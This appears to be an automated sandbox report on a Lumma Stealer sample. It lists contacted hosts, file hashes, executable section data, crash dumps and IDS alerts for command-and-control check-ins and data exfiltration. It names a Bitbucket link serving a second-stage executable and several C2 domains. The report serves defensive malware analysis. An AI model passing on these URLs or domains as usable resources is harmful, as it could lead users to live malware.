                                                                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngTmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://remote-app-switcher.prod-east.frontend.public.atl-paas.netTmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://x1.c.lencr.org/0TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://x1.i.lencr.org/0TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0TmmiCE5Ulm.exe, 00000000.00000002.2687761991.0000000000DDA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
3.5.16.86 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579676
Start date and time:2024-12-23 07:25:26 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Sample name:TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                    Original Sample Name:39a156657be03cc94d69874b25836b8c.exe
                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@13/4
                                                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                                                    • Number of non-executed functions: 2
                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.63, 4.245.163.56, 20.190.177.23, 4.175.87.197
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                    • Execution Graph export aborted for target TmmiCE5Ulm.exe, PID 5600 because there are no executed function
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:26:18 | API Interceptor | 43x Sleep call for process: TmmiCE5Ulm.exe modified
01:27:19 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e19pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
tPSrcPbmRe.exe: malicious (LummaC)
NQbg5Ht2hW.exe: malicious (LummaC)
BZuk2UI1RC.exe: malicious (LummaC)
uLkHEqZ3u3.exe: malicious (LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar)
hAmnMk8afk.exe: malicious (LummaC)
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):1.042830435951983
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:uYF14L5AndXWsAohroI7JfdQXIDcQvc6QcEVcw3cE/ri++HbHg/8BRTf3Oy1oVaz:L65SW70BU/AjudxqfzuiFRZ24IO8r
                                                                                                                                                                                                                                                                        MD5:5ADC90170AED2666954808803363A434
                                                                                                                                                                                                                                                                        SHA1:C3B5EBA59238CE242B56E3A2B2D21444E4F27811
                                                                                                                                                                                                                                                                        SHA-256:1ACEAE1C8BA7FA623ACF85464ECD2A7DCEC801C4ABFD0B2F1A6496D1AE09F4B9
                                                                                                                                                                                                                                                                        SHA-512:E69CEE9F46C046245F12D06A1BF855202221B3BBAA8D4FE9D83D82A691E598E8CB9F783C72DDA609F89DC0C18F2B891DA731423BB45D6590A75D0252F86F4000
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:low
Preview:
Version=1
EventType=APPCRASH
EventTime=133794088130473895
ReportType=2
Consent=1
UploadTime=133794088136567267
ReportStatus=524384
ReportIdentifier=5ec9a849-ba9f-49b2-a7bc-42651bb1cac4
IntegratorReportIdentifier=db14839a-02d9-4719-b649-c9d1e9c383f9
Wow64Host=34404
Wow64Guest=332
NsAppName=TmmiCE5Ulm.exe
AppSessionGuid=000015e0-0001-0014-2038-b6920355db01
TargetAppId=W:0006adb1a632a920328b377bdd9c67add33a0000ffff!0000c23e004baca2916e986c556974abaab7783bdba7!TmmiCE5Ulm.exe
TargetApp
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 06:26:53 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):286854
                                                                                                                                                                                                                                                                        Entropy (8bit):1.5103489242054462
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:qK3/BB+5BWSlaYstpIvc++w6fUtuJCU78223rJzf:PozipIvV+w6fUtuoU82iJzf
                                                                                                                                                                                                                                                                        MD5:2C6ED82DA7A69B7B620BBBFC57EA6003
                                                                                                                                                                                                                                                                        SHA1:DB624E576C2DDCE7DD12E919B1CA6D2B65D6F434
                                                                                                                                                                                                                                                                        SHA-256:140C9DD55FB0D721B0BFAA760EEEEF5B028768E14F08B61A049C3DC4586C5DD3
                                                                                                                                                                                                                                                                        SHA-512:938F5C2BA5F018FD1E78592E0CD060B29674AAC1373502F70482E457A83093AD9B358FBC198D1F06EBED8990966801333A9E2F22E02D4452D02A906A286E9246
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8384
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7040991616955927
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ4y6hY6YEIcSU9RsgmfZvprO89b4SsfDom:R6lXJ16e6YEjSU9RsgmfZV4RfZ
                                                                                                                                                                                                                                                                        MD5:62285E805E5D92B0175B6B3F13FBB1CD
                                                                                                                                                                                                                                                                        SHA1:65ECA24EAF557FDB7A187B88FC8AB2E199D87D9C
                                                                                                                                                                                                                                                                        SHA-256:26DC8D7D1DD96D08A64216B9334CA0E03FDBFECA7B438C497B411F4CC550E188
                                                                                                                                                                                                                                                                        SHA-512:B97A90623A6C90304B1CB9CFFC5DD6BDB0E7A3E59DD18063380038AFAB73F615421312F6B1FAD64304C71855B4334AF621ED53F6B3CF9ED9E0E0E9E038D2C195
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>5600</Pi
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4624
                                                                                                                                                                                                                                                                        Entropy (8bit):4.495999231849218
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsnVJg77aI9UHWpW8VYQYm8M4JBKgFv+q8Q6z7Pzz1d:uIjfnvI7C27VsJfW7Pzz1d
                                                                                                                                                                                                                                                                        MD5:5736FD727A921621F428EFCB0585CF38
                                                                                                                                                                                                                                                                        SHA1:19146FC302EA4E496ED1A49770D7514D3E19740F
                                                                                                                                                                                                                                                                        SHA-256:E94B03C01E023CFB23E9367F860FC9AE9087E8045A17B6CF613EC3028FF6A496
                                                                                                                                                                                                                                                                        SHA-512:249403464BBD071A9814922D12A6D660E80977B862353E0F0EC5FA1C6B0ECF01295BC0080F1EC4F9DA445E89001B99444F2C72A358AD641C2AD28F0964A95FE4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
 <src>
 <desc>
 <mach>
 <os>
 <arg nm="vermaj" val="10" />
 <arg nm="vermin" val="0" />
 <arg nm="verbld" val="19045" />
 <arg nm="vercsdbld" val="2006" />
 <arg nm="verqfe" val="2006" />
 <arg nm="csdbld" val="2006" />
 <arg nm="versp" val="0" />
 <arg nm="arch" val="9" />
 <arg nm="lcid" val="2057" />
 <arg nm="geoid" val="223" />
 <arg nm="sku" val="48" />
 <arg nm="domain" val="0" />
 <arg nm="prodsuite" val="256" />
 <arg nm="ntprodtype" val="1" />
 <arg nm="platid" val="2" />
 <arg nm="tmsi" val="643529" />
 <arg nm="osinsty" val="1" />
 <arg nm="iever" val="11.789.19041.0-11.0.1000" />
 <arg nm="portos" val="0" />
 <arg nm="ram" val="409
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.42156368041741
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:XSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN30uhiTwJ:CvloTMW+EZMM6DFyh03wJ
                                                                                                                                                                                                                                                                        MD5:D02F413AD6CB6B3768DEF44A35EA4D21
                                                                                                                                                                                                                                                                        SHA1:AE1396459835D7F7B1671FE664A46C92EE3DDB71
                                                                                                                                                                                                                                                                        SHA-256:0900DB5F3A48E7E66A03747E9F6D33F5297B39153B62539C13962B7C3C264684
                                                                                                                                                                                                                                                                        SHA-512:ED8D9BFC2092309B3D96E13118D3F4DE36A0F2C5EF6750A1FEB7EF9B90C710E50708D289723CD5F7F8212FAA176D25E62DFE6DACEE4D0B5099F0D99193EE557E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv*...U...
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.536442547821044
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        File size:2'934'784 bytes
                                                                                                                                                                                                                                                                        MD5:39a156657be03cc94d69874b25836b8c
                                                                                                                                                                                                                                                                        SHA1:c23e004baca2916e986c556974abaab7783bdba7
                                                                                                                                                                                                                                                                        SHA256:5bfd8db573ebaf03ceffdbe9a0b94a69574930222253a4de5ad02e2e735c9041
                                                                                                                                                                                                                                                                        SHA512:74b7a752f8edeffaa3ebadcdca0bc9f19b0939c57c12ee35eba732f39523f5bbfddd77400cc41dbf4053c4a78b4af944bfebd24554e730b8d5c5d35c5132c0b9
                                                                                                                                                                                                                                                                        SSDEEP:49152:+YqM+KnpELKiYc/ybP7+Jgq2bmOHA2K7WOJSb:P6KpELKiY0GP7+H2bjVK7WS
                                                                                                                                                                                                                                                                        TLSH:40D53A72A51872CBF49E1774D4A7CD83A95C43F98B2408E3986DB4BBBD63DC411B9C28
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.........................../.......,...@.................................T0..h..
                                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                        Entrypoint:0x6fa000
                                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        jmp 00007F05F0C28F3Ah
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x51000 | 0x24800 | 2eff7a0b93394bba3d25a72b6a474ae2 | False | 0.997431506849315 | OpenPGP Secret Key | 7.98239541875244 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x52000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| wlptngjz | 0x54000 | 0x2a5000 | 0x2a4800 | 1de4b53a0f734adaf4886bdb71d555e9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| nuxtdfjk | 0x2f9000 | 0x1000 | 0x400 | b9daadeeb83a113323ac84c444659910 | False | 0.763671875 | data | 6.022715468590857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x2fa000 | 0x3000 | 0x2200 | 7a2e34955733d2dbaa101df1b1ccab83 | False | 0.08880974264705882 | DOS executable (COM) | 1.0534260924731311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-12-23T07:26:19.826811+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.5 | 57658 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:19.969987+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.5 | 53483 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:20.251882+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.5 | 53300 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:20.422354+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.5 | 56533 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:20.575002+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.5 | 57487 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:20.737542+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.5 | 51972 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:20.908101+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.5 | 62063 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:21.049421+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.5 | 59507 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:21.191727+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.5 | 56488 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T07:26:22.907787+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP |
| 2024-12-23T07:26:23.688885+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP |
| 2024-12-23T07:26:25.273559+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:26.025898+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:26.025898+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:27.523188+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:28.306228+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:28.306228+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:30.005399+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:32.418082+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:34.851601+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:37.433944+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:38.213154+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:39.946896+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:39.957213+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49716 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:45.605600+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49733 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T07:26:46.388182+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49733 | 104.21.66.86 | 443 | TCP |
